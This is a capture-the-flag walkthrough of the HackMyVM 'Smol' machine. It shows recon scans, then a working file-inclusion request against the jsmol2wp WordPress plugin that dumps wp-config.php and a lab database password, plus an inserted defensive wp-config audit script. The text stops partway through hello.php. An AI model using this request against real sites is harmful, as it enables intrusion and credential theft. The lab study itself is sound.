hmv[-_-]Smol

Smol

Information gathering

Port scanning

┌──(kali💀kali)-[~/temp/Smol]
└─$ rustscan -a $IP -- -sCV            
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'

Open 192.168.10.100:22
Open 192.168.10.100:80

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
| ssh-rsa [key omitted]
|   256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJNL/iO8JI5DrcvPDFlmqtX/lzemir7W+WegC7hpoYpkPES6q+0/p4B2CgDD0Xr1AgUmLkUhe2+mIJ9odtlWW30=
|   256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFG/Wi4PUTjReEdk2K4aFMi8WzesipJ0bp0iI0FM8AfE
80/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://www.smol.hmv
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The HTTP redirect reveals a hostname; add it to the hosts file:

192.168.10.100    www.smol.hmv

Directory scanning

┌──(kali💀kali)-[~/temp/Smol]
└─$ feroxbuster  -u http://smol.hmv -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php txt html -s 200 301 302 -d 1

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://smol.hmv
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ [200, 301, 302]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php, txt, html]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 1
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
301      GET        0l        0w        0c http://smol.hmv/ => http://www.smol.hmv/
301      GET        0l        0w        0c http://smol.hmv/index.php => http://www.smol.hmv/
301      GET        9l       28w      309c http://smol.hmv/wp-content => http://smol.hmv/wp-content/
200      GET       81l      274w     4537c http://smol.hmv/wp-login.php
200      GET      384l     3177w    19903c http://smol.hmv/license.txt
301      GET        9l       28w      310c http://smol.hmv/wp-includes => http://smol.hmv/wp-includes/
200      GET      394l      768w     6125c http://smol.hmv/wp-admin/css/install.css
200      GET       13l       78w     4373c http://smol.hmv/wp-admin/images/wordpress-logo.png
200      GET       23l       81w     1259c http://smol.hmv/wp-admin/upgrade.php
302      GET        0l        0w        0c http://smol.hmv/wp-admin/ => http://www.smol.hmv/wp-login.php?redirect_to=http%3A%2F%2Fsmol.hmv%2Fwp-admin%2F&reauth=1
302      GET        0l        0w        0c http://smol.hmv/wp-admin/import.php => http://www.smol.hmv/wp-login.php?redirect_to=http%3A%2F%2Fsmol.hmv%2Fwp-admin%2Fimport.php&reauth=1
302      GET        0l        0w        0c http://smol.hmv/wp-admin/update-core.php => http://www.smol.hmv/wp-login.php?redirect_to=http%3A%2F%2Fsmol.hmv%2Fwp-admin%2Fupdate-core.php&reauth=1
200      GET       17l       82w     1261c http://smol.hmv/wp-admin/install.php
200      GET       98l      836w     7425c http://smol.hmv/readme.html
200      GET        5l       15w      135c http://smol.hmv/wp-trackback.php
301      GET        9l       28w      307c http://smol.hmv/wp-admin => http://smol.hmv/wp-admin/
302      GET        0l        0w        0c http://smol.hmv/wp-signup.php => http://www.smol.hmv/wp-login.php?action=register
[#######>------------] - 3m    319651/882248  5m      found:17      errors:0      
[####################] - 8m    882248/882248  0s      found:17      errors:0      
[####################] - 8m    882184/882184  1953/s  http://smol.hmv/

Blog scanning

It looks like WordPress, so try a CMS scan:

┌──(kali💀kali)-[~/temp/Smol]
└─$ cmseek -u http://www.smol.hmv -v

[i] Updating CMSeeK result index...
[*] Report index updated successfully!

 ___ _  _ ____ ____ ____ _  _
|    |\/| [__  |___ |___ |_/  by @r3dhax0r
|___ |  | ___| |___ |___ | \_ Version 1.1.3 K-RONA

 [+]  CMS Detection And Deep Scan  [+] 

[i] Scanning Site: http://www.smol.hmv
[+] User Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0
[+] Collecting Headers and Page Source for Analysis
[+] Detection Started
[+] Using headers to detect CMS (Stage 1 of 4)
[*] CMS Detected, CMS ID: wp, Detection method: header
[+] Getting CMS info from database
[+] Starting WordPress DeepScan
[+] Detecting Version and vulnerabilities
[+] Generator Tag Available... Trying version detection using generator meta tag
[*] Version Detected, WordPress Version 6.8.1
[+] Initiating open directory and files check
[+] XML-RPC interface not available
[+] Looking for potential path disclosure
[i] Checking user registration status
[i] Starting passive plugin enumeration
[*] 1 Plugin enumerated!
[i] Starting passive theme enumeration
[+] Looking for theme zip file!
[*] 1 theme detected!
[i] Starting Username Harvest
[i] Harvesting usernames from wp-json api
[!] Json api method failed trying with next
[i] Harvesting usernames from jetpack public api
[!] No results from jetpack api... maybe the site doesn't use jetpack
[i] Harvesting usernames from wordpress author Parameter
[*] Found user from source code: xavi
[*] Found user from source code: diego
[*] Found user from source code: gege
[*] Found user from redirection: admin
[*] Found user from redirection: think
[*] Found user from redirection: wp
[*] 6 Usernames were enumerated
[i] Checking version vulnerabilities using wpvulns.com
[x] Error Retriving data from wpvulndb
___ _  _ ____ ____ ____ _  _
|    |\/| [__  |___ |___ |_/  by @r3dhax0r
|___ |  | ___| |___ |___ | \_ Version 1.1.3 K-RONA

 [+]  Deep Scan Results  [+] 

 ┏━Target: www.smol.hmv
 ┃
 ┠── CMS: WordPress
 ┃    │
 ┃    ├── Version: 6.8.1
 ┃    ╰── URL: https://wordpress.org
 ┃
 ┠──[WordPress Deepscan]
 ┃    │
 ┃    ├── Readme file found: http://www.smol.hmv/readme.html
 ┃    ├── License file: http://www.smol.hmv/license.txt
 ┃    ├── Uploads directory has listing enabled: http://www.smol.hmv/wp-content/uploads
 ┃    │
 ┃    ├── Plugins Enumerated: 1
 ┃    │    │
 ┃    │    ╰── Plugin: jsmol2wp
 ┃    │        │
 ┃    │        ├── Version: 14.1.7
 ┃    │        ╰── URL: http://www.smol.hmv/wp-content/plugins/jsmol2wp
 ┃    │
 ┃    │
 ┃    ├── Themes Enumerated: 1
 ┃    │    │
 ┃    │    ╰── Theme: popularfx
 ┃    │        │
 ┃    │        ├── Version: 1.2.5
 ┃    │        ╰── URL: http://www.smol.hmv/wp-content/themes/popularfx
 ┃    │
 ┃    │
 ┃    ├── Usernames harvested: 6
 ┃    │    │
 ┃    │    ├── wp
 ┃    │    ├── think
 ┃    │    ├── diego
 ┃    │    ├── gege
 ┃    │    ├── xavi
 ┃    │    ╰── admin
 ┃    │
 ┃
 ┠── Result: /home/kali/temp/Smol/Result/www.smol.hmv/cms.json
 ┃
 ┗━Scan Completed in 0.88 Seconds, using 45 Requests

 CMSeeK says ~ addio

Vulnerability discovery

Information gathering

Several users and one plugin, jsmol2wp, were found. A quick look turned up no relevant vulnerabilities, so run wpscan:

┌──(kali💀kali)-[~/temp/Smol]
└─$ wpscan --url http://www.smol.hmv --api-token xxxxxxxxxxxxxxxxxxx
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://www.smol.hmv/ [192.168.10.100]
[+] Started: Fri Jun  6 22:30:50 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://www.smol.hmv/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://www.smol.hmv/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://www.smol.hmv/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://www.smol.hmv/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

Fingerprinting the version - Time: 00:00:03 <============================================================================================================> (702 / 702) 100.00% Time: 00:00:03
[i] The WordPress version could not be detected.

[+] WordPress theme in use: popularfx
 | Location: http://www.smol.hmv/wp-content/themes/popularfx/
 | Last Updated: 2024-11-19T00:00:00.000Z
 | Readme: http://www.smol.hmv/wp-content/themes/popularfx/readme.txt
 | [!] The version is out of date, the latest version is 1.2.6
 | Style URL: http://www.smol.hmv/wp-content/themes/popularfx/style.css?ver=1.2.5
 | Style Name: PopularFX
 | Style URI: https://popularfx.com
 | Description: Lightweight theme to make beautiful websites with Pagelayer. Includes 100s of pre-made templates to ...
 | Author: Pagelayer
 | Author URI: https://pagelayer.com
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://www.smol.hmv/wp-content/themes/popularfx/style.css?ver=1.2.5, Match: 'Version: 1.2.5'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 0
 | Requests Remaining: 23

[+] Finished: Fri Jun  6 22:30:58 2025
[+] Requests Done: 706
[+] Cached Requests: 609
[+] Data Sent: 191.137 KB
[+] Data Received: 179.346 KB
[+] Memory used: 248.938 MB
[+] Elapsed time: 00:00:07

Scan Aborted: wrong constant name 

            version_finder_module.const_set(constant_name, Module.new)
                                 ^^^^^^^^^^
Trace: /usr/share/rubygems-integration/all/gems/wpscan-3.8.25/lib/wpscan/db/dynamic_finders/plugin.rb:70:in `const_set'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/lib/wpscan/db/dynamic_finders/plugin.rb:70:in `maybe_create_module'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/lib/wpscan/db/dynamic_finders/plugin.rb:83:in `create_versions_finders'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/app/finders/plugin_version.rb:23:in `create_and_load_dynamic_versions_finders'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/app/finders/plugin_version.rb:16:in `initialize'
/usr/share/rubygems-integration/all/gems/cms_scanner-0.13.9/lib/cms_scanner/finders/independent_finder.rb:12:in `new'
/usr/share/rubygems-integration/all/gems/cms_scanner-0.13.9/lib/cms_scanner/finders/independent_finder.rb:12:in `find'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/app/models/plugin.rb:34:in `version'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/app/controllers/enumeration/enum_methods.rb:79:in `each'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/app/controllers/enumeration/enum_methods.rb:79:in `enum_plugins'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/app/controllers/enumeration.rb:13:in `run'
/usr/share/rubygems-integration/all/gems/cms_scanner-0.13.9/lib/cms_scanner/controllers.rb:50:in `each'
/usr/share/rubygems-integration/all/gems/cms_scanner-0.13.9/lib/cms_scanner/controllers.rb:50:in `block in run'
/usr/lib/ruby/3.1.0/timeout.rb:84:in `timeout'
/usr/share/rubygems-integration/all/gems/cms_scanner-0.13.9/lib/cms_scanner/controllers.rb:45:in `run'
/usr/share/rubygems-integration/all/gems/cms_scanner-0.13.9/lib/cms_scanner/scan.rb:24:in `run'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/bin/wpscan:17:in `block in <top (required)>'
/usr/share/rubygems-integration/all/gems/cms_scanner-0.13.9/lib/cms_scanner/scan.rb:15:in `initialize'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/bin/wpscan:6:in `new'
/usr/share/rubygems-integration/all/gems/wpscan-3.8.25/bin/wpscan:6:in `<top (required)>'
/usr/bin/wpscan:25:in `load'
/usr/bin/wpscan:25:in `<main>'

Error handling

A strange error appeared and I don't know how to fix it, so try upgrading:

┌──(kali💀kali)-[~/temp/Smol]
└─$ sudo apt-get update && sudo apt-get upgrade
# sudo apt autoremove

But after the upgrade a new error appeared:

┌──(kali💀kali)-[~/temp/Smol]
└─$ wpscan             
/usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1421:in `block in activate_dependencies': Could not find 'opt_parse_validator' (~> 1.9.5) among 159 total gem(s) (Gem::MissingSpecError)
Checked in 'GEM_PATH=/home/kali/.local/share/gem/ruby/3.1.0:/var/lib/gems/3.1.0:/usr/local/lib/ruby/gems/3.1.0:/usr/lib/ruby/gems/3.1.0:/usr/lib/x86_64-linux-gnu/ruby/gems/3.1.0:/usr/share/rubygems-integration/3.1.0:/usr/share/rubygems-integration/all:/usr/lib/x86_64-linux-gnu/rubygems-integration/3.1.0' at: /usr/share/rubygems-integration/all/specifications/cms_scanner-0.13.9.gemspec, execute `gem env` for more information
        from /usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1407:in `each'
        from /usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1407:in `activate_dependencies'
        from /usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1389:in `activate'
        from /usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1423:in `block in activate_dependencies'
        from /usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1407:in `each'
        from /usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1407:in `activate_dependencies'
        from /usr/lib/ruby/vendor_ruby/rubygems/specification.rb:1389:in `activate'
        from /usr/lib/ruby/vendor_ruby/rubygems.rb:290:in `block in activate_bin_path'
        from /usr/lib/ruby/vendor_ruby/rubygems.rb:289:in `synchronize'
        from /usr/lib/ruby/vendor_ruby/rubygems.rb:289:in `activate_bin_path'
        from /usr/bin/wpscan:25:in `<main>'

Trying to fix it, I found a solution someone posted on GitHub:

https://github.com/wpscanteam/wpscan/issues/1243#issuecomment-489421054

Resolved the same issue. In my fix, I did NOT uninstall anything.

apt-get install ruby-dev
gem install ffi --platform=ruby
gem install yajl-ruby
apt-get install libxslt-dev libxml2-dev
gem install nokogiri -- --use-system-libraries

Then wpscan worked.

But that did not fully resolve it; no matter, I will switch to another Kali later.

Plugin exploitation

Try googling for vulnerabilities in the plugin; first check its version:

┌──(kali💀kali)-[~/temp/Smol]
└─$ curl -s http://www.smol.hmv/wp-content/plugins/jsmol2wp/ | html2text
****** Index of /wp-content/plugins/jsmol2wp ******
[[ICO]]       Name                  Last_modified    Size Description
===========================================================================
[[PARENTDIR]] Parent_Directory                         -  
[[   ]]       JSmol.min.js          2023-08-16 20:24 224K  
[[   ]]       JSmol.min.nojq.js     2023-08-16 20:24 129K  
[[   ]]       add-textdomain.php    2023-08-16 20:24 4.6K  
[[   ]]       class.jsMol2wp.php    2023-08-16 20:24 9.8K  
[[DIR]]       css/                  2023-08-16 20:22    -  
[[TXT]]       help.htm              2023-08-16 20:24 9.0K  
[[DIR]]       idioma/               2023-08-16 20:22    -  
[[DIR]]       images/               2023-08-16 20:22    -  
[[DIR]]       j2s/                  2023-08-16 20:22    -  
[[   ]]       jsmol2wp.php          2023-08-16 20:24 2.4K  
[[TXT]]       jsmol_template.htm    2023-08-16 20:24 2.0K  
[[DIR]]       php/                  2023-08-16 20:22    -  
[[TXT]]       readme.txt            2023-08-16 20:24 5.2K  
[[TXT]]       simple.htm            2023-08-16 20:24 6.3K  
[[TXT]]       updating_jsmol2wp.txt 2023-08-16 20:24  475  
===========================================================================
     Apache/2.4.41 (Ubuntu) Server at www.smol.hmv Port 80

┌──(kali💀kali)-[~/temp/Smol]
└─$ curl -s http://www.smol.hmv/wp-content/plugins/jsmol2wp/readme.txt | html2text
=== JSmol2WP ===
Contributors: Jim Hu
Tags: shortcodes, JSmol, Jmol, molecular graphics, PDB
Requires at least: 3.0
Tested up to: 4.9.4
Donate link: http://biochemistry.tamu.edu/index.php/alum/giving/
Stable tag: 1.07
License: GPLv2 or later
License URI: http://www.gnu.org/licenses/gpl-2.0.html
Text domain: jsmol2wp
Domain path: /languages/

Plugin to place JSmol molecular graphics applets in WordPress posts or pages.

== Description ==

This shortcode plugin places JSmol applets in WordPress posts and pages. Use [jsmol pdb='accession'] for a minimal version. jsmol2wp will look to see if a pdb file has been uploaded to your wordpress and it will use that file if it can find it. If it can't find a matching post for an uploaded attachement, it will try http://rcsb.org/pdb. If it can't find a match there either, you'll get an error message in the JSmol window. Additional information on optional parameters are at the About/Help link in the applets. This plugin was developed for use on the website for the Department of Biochemistry and Biophysics at Texas A&M University (http://biochemistry.tamu.edu).

== Installation ==

Place in the plugins directory and activate. No additional files or configurations are needed. Thanks to Bob Hanson and the JMol team for making the javascript code for jsmol available. See: http://chemapps.stolaf.edu/jmol/jsmol http://wiki.jmol.org/index.php/Jmol_JavaScript_Object This plugin also benefited from using Jaime Prilusky's mediawiki extension for inspiration http://proteopedia.org/support/JSmolExtension/

== Upgrade Notice ==

Version 1.03 updates the Jmol libraries and fixes a bug with the load parameter

== Frequently Asked Questions ==

= Is there an example of an installation? =
See http://jimhu.org/jsmol2wp-plugin-released-at-wordpress-org/

= Where can I learn more about what JSmol can do? =
Jmol documentation can be found at http://jmol.sourceforge.net/#Learn%20to%20use%20Jmol and http://jmol.sourceforge.net/docs/JmolUserGuide/

== Screenshots ==

1. Applet for a protein.
2. Applet for a small molecule.

== Changelog ==

= 1.07 =
fix extremely stupid svn error where needed files from the j2s directory were not in the repo
= 1.06 =
change rcsb file path to avoid redirect
= 1.05 =
load rcsb pdb files via https instead of http
= 1.04 =
* updated jsmol package from Jmol sourceforge
* first attempt at internationalization
** Added idioma directory from jsMol distributions
** Added set language directive based on wordpress get_locale()
= 1.03 =
* updated jsmol package from Jmol sourceforge
* Remove beta from help.htm
* fix bug where load param was not working
= 1.02 =
* fixes to this readme.txt file to improve the display at the wordpress.org plugin repository
= 1.01 =
* tweaks for wordpress.org deposition
= 1.0 =
* update JSmol code to 14.3.12_2015.01.28
* prepare for release to wordpress.org plugin repository
= 0.94 beta =
* add isosurface support
* rewrite the code to set up structure loading
* replace WP get_page_by_title with a function that matches the filename
* add jvxl to file types
* fixed bug where caption nonmatching required casting match as a string.
* move the help demo page to a more stable URL.
= 0.93 beta =
* set default type based on fileurl extension if present
* fix bug where reset button failed with data from fileurl
= 0.92 beta =
* change appletID to not require $acc.
= 0.9 beta =
* improve help page
* improve uniqueness identifiers for multiple Jmolapplets on the same post/page; add the option to hand code instances
* improve debug messages (or at least change them)
* make reset button standard and have it remember the load commands
* standard buttons depend on the type of molecule loaded.
* add some semicolons to the template to try to fix lint warnings: http://www.javascriptlint.com/online_lint.php
= 0.8 beta =
* removed data directory
* changed system for counting instances of the shorttag so we don't need preg_match
* removed whitespace from template hoping that solves the problem of themes adding markup
* simplified load script as suggested by Bob Hansen
* made applet IDs more unique by appending post id
= 0.7 beta =
* update jsmol libraries to 4.1.7_2014.06.09
* add dependencies for jquery-ui-core and jquery-ui-menu fixes popup problem in some themes
* refactor to support additional file types (in progress)
* fix multiline regex bug
* fix bug that caused failure to load when permalinks used ?p=post_number format
* debug constructor
* debug view
..* add path to uploaded file
..* add test for get_page_by_title
= 0.6 alpha =
* register script before enqueueing it.
* added ability to add Jmol.script commands
* added the ability to add jmolCommandInput
= 0.5 alpha =
* added wrap and debug options
= 0.4 alpha =
* changed to nojq.
* modified command processing to not split on allowed characters in Jmol syntax.
= 0.3 alpha =
* changed default to spin off in order to save client cpu
* custom command buttons working.
= 0.2 alpha =
* changed system to use a template based on the distro file simple1.htm.
* added captioning
* works with local or remote pdb files from rcsb.org/pdb
= 0.1 pre-alpha =
* basic shortcode working with uploaded pdb file
* adds .pdb chemical/pdb mime type to allowed mime types
* handles multiple shortcodes on the same page

The version is 1.07; search for it:

[screenshot]

There is a file inclusion vulnerability; try it out:

{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php

It returns the file:

┌──(kali💀kali)-[~/temp/Smol]
└─$ curl -s "http://www.smol.hmv/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php"
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/documentation/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** Database username */
define( 'DB_USER', 'wpuser' );

/** Database password */
define( 'DB_PASSWORD', 'kbLSF2Vop#lw3rjDZ629*Z%G' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'put your unique phrase here' );
define( 'SECURE_AUTH_KEY',  'put your unique phrase here' );
define( 'LOGGED_IN_KEY',    'put your unique phrase here' );
define( 'NONCE_KEY',        'put your unique phrase here' );
define( 'AUTH_SALT',        'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT',   'put your unique phrase here' );
define( 'NONCE_SALT',       'put your unique phrase here' );

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/documentation/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';

It also leaks a set of user credentials:

wpuser
kbLSF2Vop#lw3rjDZ629*Z%G
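Beyond the database password, every one of the eight keys and salts in the wp-config.php above is still the installer placeholder, so anyone who has read the file (or simply knows the string) has the material WordPress uses to sign cookies and nonces. The following is an added example, not code from this writeup or from WordPress: a small Python audit that parses the define() calls in a wp-config.php and flags placeholder or short salts, WP_DEBUG left on, a missing DISALLOW_FILE_EDIT (which would have disabled the dashboard plugin editor) and a short database password. The sample config is constructed from the disclosed file with the real password replaced by a placeholder, and the length thresholds are my own assumptions.

```python
import re

# Constructed sample: the define() lines that matter from the wp-config.php disclosed
# above, with the real database password replaced by a placeholder.
SAMPLE_WP_CONFIG = r"""
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpuser' );
define( 'DB_PASSWORD', 'REDACTED_DB_PASSWORD' );
define( 'DB_HOST', 'localhost' );
define( 'AUTH_KEY',         'put your unique phrase here' );
define( 'SECURE_AUTH_KEY',  'put your unique phrase here' );
define( 'LOGGED_IN_KEY',    'put your unique phrase here' );
define( 'NONCE_KEY',        'put your unique phrase here' );
define( 'AUTH_SALT',        'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT',   'put your unique phrase here' );
define( 'NONCE_SALT',       'put your unique phrase here' );
define( 'WP_DEBUG', false );
"""

# The eight keys/salts WordPress uses to sign cookies and nonces.
SALT_KEYS = (
    "AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
    "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT",
)
PLACEHOLDER = "put your unique phrase here"

# Matches define( 'NAME', 'value' ), define( "NAME", "value" ) and define( 'NAME', true ).
DEFINE_RE = re.compile(
    r"""define\(\s*['"]([A-Za-z_][A-Za-z0-9_]*)['"]\s*,\s*"""
    r"""(?:'((?:[^'\\]|\\.)*)'|"((?:[^"\\]|\\.)*)"|([A-Za-z0-9_.]+))\s*\)"""
)


def parse_defines(source):
    """Return {CONSTANT: value} for every define() call in a wp-config.php source."""
    consts = {}
    for m in DEFINE_RE.finditer(source):
        name, single, double, bare = m.groups()
        if single is not None:
            value = single
        elif double is not None:
            value = double
        else:
            value = {"true": True, "false": False}.get(bare.lower(), bare)
        consts[name] = value
    return consts


def audit_wp_config(source):
    """Return (constant, problem) pairs for the weaknesses this check knows about."""
    consts = parse_defines(source)
    findings = []
    for key in SALT_KEYS:
        value = consts.get(key)
        if value is None:
            findings.append((key, "not defined in wp-config.php"))
        elif value == PLACEHOLDER:
            findings.append((key, "left at the installer placeholder; cookies are signed with a public string"))
        elif len(value) < 32:
            # Assumed threshold: generated salts are far longer than 32 characters.
            findings.append((key, "shorter than 32 characters"))
    if consts.get("WP_DEBUG") is True:
        findings.append(("WP_DEBUG", "enabled; leaks paths and notices to visitors"))
    if consts.get("DISALLOW_FILE_EDIT") is not True:
        findings.append(("DISALLOW_FILE_EDIT", "not set; the dashboard plugin/theme editor can write PHP"))
    pw = consts.get("DB_PASSWORD", "")
    if isinstance(pw, str) and len(pw) < 12:   # assumed minimum length
        findings.append(("DB_PASSWORD", "shorter than 12 characters"))
    return findings


if __name__ == "__main__":
    for const, problem in audit_wp_config(SAMPLE_WP_CONFIG):
        print(f"{const}: {problem}")
```

Run against the constructed sample it reports all eight salts and the missing DISALLOW_FILE_EDIT; the same check on a config with generated 64-character salts and the editor disabled reports nothing.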

Try logging in; the default login page is http://www.smol.hmv/wp-admin

[screenshot]

Login successful! Then some useful information was found:

# Webmaster Tasks!! — Private

1- [IMPORTANT] Check Backdoors: Verify the SOURCE CODE of "Hello Dolly" plugin as the site's code revision.

2- Set Up HTTPS: Configure an SSL certificate to enable HTTPS and encrypt data transmission.

3- Update Software: Regularly update your CMS, plugins, and themes to patch vulnerabilities.

4- Strong Passwords: Enforce strong passwords for users and administrators.

5- Input Validation: Validate and sanitize user inputs to prevent attacks like SQL injection and XSS.

6- [IMPORTANT] Firewall Installation: Install a web application firewall (WAF) to filter incoming traffic.

7- Backup Strategy: Set up regular backups of your website and databases.

8- [IMPORTANT] User Permissions: Assign minimum necessary permissions to users based on roles.

9- Content Security Policy: Implement a CSP to control resource loading and prevent malicious scripts.

10- Secure File Uploads: Validate file types, use secure upload directories, and restrict execution permissions.

11- Regular Security Audits: Conduct routine security assessments, vulnerability scans, and penetration tests.

This suggests the Hello Dolly plugin has something exploitable in it; look at the source code:

[screenshots]

The file is named hello.php; use the file inclusion vulnerability to read its source:

┌──(kali💀kali)-[~/temp/Smol]
└─$ curl -s "http://www.smol.hmv/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../hello.php" 
<?php
/**
 * @package Hello_Dolly
 * @version 1.7.2
 */
/*
Plugin Name: Hello Dolly
Plugin URI: http://wordpress.org/plugins/hello-dolly/
Description: This is not just a plugin, it symbolizes the hope and enthusiasm of an entire generation summed up in two words sung most famously by Louis Armstrong: Hello, Dolly. When activated you will randomly see a lyric from <cite>Hello, Dolly</cite> in the upper right of your admin screen on every page.
Author: Matt Mullenweg
Version: 1.7.2
Author URI: http://ma.tt/
*/

function hello_dolly_get_lyric() {
